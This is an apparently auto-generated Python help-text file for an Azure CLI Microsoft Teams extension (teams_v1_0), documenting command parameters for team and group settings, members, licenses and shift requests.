helps['teams chat'] = """
type: group
short-summary: Manage chat with teams_v1_0
"""
helps['teams chat show-all-message'] = """
type: command
short-summary: "Invoke function getAllMessages."
"""
helps['teams group'] = """
type: group
short-summary: Manage group with teams_v1_0
"""
helps['teams group delete-team'] = """
type: command
short-summary: "Delete navigation property team for groups."
"""
helps['teams group show-team'] = """
type: command
short-summary: "Get team from groups."
"""
helps['teams group update-team'] = """
type: command
short-summary: "Update the navigation property team in groups."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email address to send notifications for groups without owners. \
Multiple email address can be defined by separating email address with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team'] = """
type: group
short-summary: Manage team team with teams_v1_0
"""
helps['teams team list'] = """
type: command
short-summary: "Get entities from teams."
"""
helps['teams team create'] = """
type: command
short-summary: "Add new entity to teams."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email address to send notifications for groups without owners. \
Multiple email address can be defined by separating email address with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team update'] = """
type: command
short-summary: "Update entity in teams."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
